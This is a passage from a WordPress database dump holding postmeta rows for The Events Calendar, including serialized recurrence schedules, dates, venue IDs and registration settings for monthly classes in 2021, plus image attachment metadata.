11404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115730,262794,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(114542,262794,'_EventStartDate','2021-04-18 09:00:00'),(114543,262794,'_EventStartDateUTC','2021-04-18 15:00:00'),(114544,262794,'_EventEndDate','2021-04-18 10:10:00'),(114545,262794,'_EventEndDateUTC','2021-04-18 16:10:00'),(114546,262794,'_EventDuration','4200'),(116691,262869,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607511780;s:12:\"_EventOrigin\";i:1607511780;s:10:\"_edit_last\";i:1607511837;s:10:\"post_title\";i:1607511840;s:12:\"post_content\";i:1607513498;s:11:\"post_status\";i:1607512029;s:16:\"tribe_events_cat\";i:1607537229;s:13:\"_thumbnail_id\";i:1607512029;s:26:\"_RTECregistrationsDisabled\";i:1607512029;s:17:\"_RTECdeadlineType\";i:1607512029;s:19:\"_RTECwhoCanRegister\";i:1607512029;s:23:\"_RTEClimitRegistrations\";i:1607512029;s:21:\"_RTECmaxRegistrations\";i:1607512029;s:24:\"boldgrid_hide_page_title\";i:1607512029;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607512029;s:13:\"_EventShowMap\";i:1607512029;s:13:\"_EventVenueID\";i:1607512029;s:15:\"_EventStartDate\";i:1607512029;s:13:\"_EventEndDate\";i:1607512029;s:18:\"_EventStartDateUTC\";i:1607512029;s:16:\"_EventEndDateUTC\";i:1607512029;s:14:\"_EventDuration\";i:1607512029;s:20:\"_EventCurrencySymbol\";i:1607512029;s:22:\"_EventCurrencyPosition\";i:1607512029;s:10:\"_EventCost\";i:1607512029;s:9:\"_EventURL\";i:1607512029;s:14:\"_EventTimezone\";i:1607512029;s:18:\"_EventTimezoneAbbr\";i:1607512029;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(116692,262869,'_EventOrigin','events-calendar'),(151815,266081,'mec_comment',''),(115715,262794,'_RTECregistrationsDisabled','1'),(115716,262794,'_RTECdeadlineType','start'),(115713,262794,'_EventOrigin','events-calendar'),(115683,262792,'_EventCurrencySymbol',''),(115684,262792,'_EventCurrencyPosition','prefix'),(115685,262792,'_EventCost',''),(115680,262792,'_EventShowMapLink','1'),(115681,262792,'_EventShowMap','1'),(115682,262792,'_EventVenueID','262507'),(115670,262792,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(122292,263250,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122297,263250,'_EventShowMap','1'),(122298,263250,'_EventCurrencySymbol',''),(122270,263249,'_RTECdeadlineType','start'),(122258,263249,'boldgrid_hide_page_title','1'),(122273,263249,'_RTECmaxRegistrations','30'),(122274,263249,'_EventVenueID','262507'),(122276,263249,'_wp_old_slug','soul-travel-2-class'),(122277,263249,'_wp_old_slug','the-easy-way'),(119413,262744,'_EventOrigin','events-calendar'),(114454,262791,'_EventEndDate','2021-01-17 10:10:00'),(114455,262791,'_EventEndDateUTC','2021-01-17 17:10:00'),(122305,263250,'_RTECregistrationsDisabled','1'),(114411,262789,'_edit_last','2'),(122240,263248,'_wp_old_slug','soul-travel-2-class'),(122241,263248,'_wp_old_slug','the-easy-way'),(114748,262801,'protect_children',''),(122271,263249,'_RTECwhoCanRegister','any'),(114410,262789,'_edit_lock','1619291382:2'),(122199,263247,'_RTECwhoCanRegister','any'),(122180,263247,'_EventOrigin','events-calendar'),(122181,263247,'_EventOrigin','events-calendar'),(122174,263247,'_EventStartDate','2021-02-07 12:00:00'),(122175,263247,'_EventStartDateUTC','2021-02-07 19:00:00'),(122176,263247,'_EventEndDate','2021-02-07 13:30:00'),(122177,263247,'_EventEndDateUTC','2021-02-07 20:30:00'),(122185,263247,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122178,263247,'_EventDuration','5400'),(122179,263247,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122182,263247,'_EventOrigin','events-calendar'),(122183,263247,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122188,263247,'_EventShowMapLink','1'),(122191,263247,'_EventCurrencyPosition','prefix'),(122192,263247,'_EventCost',''),(122193,263247,'_EventURL',''),(122194,263247,'_EventTimezone','America/Denver'),(122184,263247,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122187,263247,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122189,263247,'_EventShowMap','1'),(122190,263247,'_EventCurrencySymbol',''),(121031,263196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:555;s:6:\"height\";i:324;s:4:\"file\";s:32:\"2021/01/loveland-center-nd-2.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"loveland-center-nd-2-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"loveland-center-nd-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"loveland-center-nd-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"C725UZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:12:\"-62169984000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.4\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121030,263196,'_wp_attached_file','2021/01/loveland-center-nd-2.jpg'),(121028,263190,'smush-complete','1'),(121029,263190,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75084;s:12:\"smushed-size\";i:70727;s:15:\"savings-percent\";d:5.79999999999999982236431605997495353221893310546875;}'),(115711,262794,'protect_children',''),(115712,262794,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115710,262794,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115743,262795,'_EventShowMapLink','1'),(115744,262795,'_EventShowMap','1'),(115745,262795,'_EventVenueID','262507'),(115746,262795,'_EventCurrencySymbol',''),(115747,262795,'_EventCurrencyPosition','prefix'),(114572,262795,'_EventStartDate','2021-05-16 09:00:00'),(151825,266081,'mec_end_time_hour','8'),(119711,262989,'protect_children',''),(114752,262801,'_edit_last','2'),(119428,262744,'_EventShowMap','1'),(114415,262789,'_RTECwhoCanRegister','any'),(114416,262789,'_RTEClimitRegistrations','0'),(122198,263247,'_RTECdeadlineType','start'),(122169,263246,'_wp_old_slug','the-easy-way'),(122170,263246,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122168,263246,'_wp_old_slug','soul-travel-2-class'),(122161,263246,'_RTECregistrationsDisabled','1'),(122150,263246,'boldgrid_hide_page_title','1'),(122166,263246,'_EventVenueID','262507'),(122151,263246,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122149,263246,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122153,263246,'_EventShowMap','1'),(122154,263246,'_EventCurrencySymbol',''),(114749,262801,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607510750;s:12:\"_EventOrigin\";i:1607510750;s:10:\"_edit_last\";i:1607510775;s:10:\"post_title\";i:1607510850;s:12:\"post_content\";i:1607510890;s:11:\"post_status\";i:1607510890;s:16:\"tribe_events_cat\";i:1607536670;s:13:\"_thumbnail_id\";i:1607510889;s:26:\"_RTECregistrationsDisabled\";i:1607510889;s:17:\"_RTECdeadlineType\";i:1607510889;s:19:\"_RTECwhoCanRegister\";i:1607510889;s:23:\"_RTEClimitRegistrations\";i:1607510889;s:21:\"_RTECmaxRegistrations\";i:1607510889;s:24:\"boldgrid_hide_page_title\";i:1607510889;s:16:\"_EventRecurrence\";i:1607510890;s:17:\"_EventShowMapLink\";i:1607510890;s:13:\"_EventShowMap\";i:1607510890;s:13:\"_EventVenueID\";i:1607510890;s:15:\"_EventStartDate\";i:1607510890;s:13:\"_EventEndDate\";i:1607510890;s:18:\"_EventStartDateUTC\";i:1607510890;s:16:\"_EventEndDateUTC\";i:1607510890;s:14:\"_EventDuration\";i:1607510890;s:20:\"_EventCurrencySymbol\";i:1607510890;s:22:\"_EventCurrencyPosition\";i:1607510890;s:10:\"_EventCost\";i:1607510890;s:9:\"_EventURL\";i:1607510890;s:14:\"_EventTimezone\";i:1607510890;s:18:\"_EventTimezoneAbbr\";i:1607510890;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511472;}'),(114751,262801,'_edit_lock','1619292012:2'),(122152,263246,'_EventShowMapLink','1'),(122484,263255,'protect_children',''),(122122,263245,'_EventTimezone','America/Denver'),(122158,263246,'_EventTimezone','America/Denver'),(122159,263246,'_dp_original','201534'),(122160,263246,'protect_children',''),(122156,263246,'_EventCost',''),(122157,263246,'_EventURL',''),(122147,263246,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122144,263246,'_EventOrigin','events-calendar'),(122145,263246,'_EventOrigin','events-calendar'),(122138,263246,'_EventStartDate','2021-01-03 12:00:00'),(122139,263246,'_EventStartDateUTC','2021-01-03 19:00:00'),(122146,263246,'_EventOrigin','events-calendar'),(122140,263246,'_EventEndDate','2021-01-03 13:30:00'),(122141,263246,'_EventEndDateUTC','2021-01-03 20:30:00'),(122142,263246,'_EventDuration','5400'),(122143,263246,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122197,263247,'_RTECregistrationsDisabled','1'),(114754,262801,'_RTECregistrationsDisabled','1'),(122252,263249,'_EventOrigin','events-calendar'),(122148,263246,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(114750,262801,'_EventOrigin','events-calendar'),(122195,263247,'_dp_original','201534'),(122196,263247,'protect_children',''),(122162,263246,'_RTECdeadlineType','start'),(122163,263246,'_RTECwhoCanRegister','any'),(122186,263247,'boldgrid_hide_page_title','1'),(122200,263247,'_RTEClimitRegistrations','0'),(122201,263247,'_RTECmaxRegistrations','30'),(122202,263247,'_EventVenueID','262507'),(122204,263247,'_wp_old_slug','soul-travel-2-class'),(122205,263247,'_wp_old_slug','the-easy-way'),(122206,263247,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122238,263248,'_EventVenueID','262507'),(103384,114734,'_RTECwhoCanRegister','any'),(103075,128992,'_RTECregistrationsDisabled','1'),(103076,128992,'_RTECdeadlineType','start'),(103077,128992,'_RTECwhoCanRegister','any'),(103078,128992,'_RTEClimitRegistrations','0'),(103382,114734,'_RTECregistrationsDisabled','1'),(103383,114734,'_RTECdeadlineType','start'),(103079,128992,'_RTECmaxRegistrations','30'),(55308,242994,'_wp_attached_file','2020/01/about-background-sized.jpg'),(55309,242994,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:604;s:4:\"file\";s:34:\"2020/01/about-background-sized.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-background-sized-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"about-background-sized-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-background-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"about-background-sized-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-background-sized-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"about-background-sized-48x48.jpg\";s:5:\"width\";i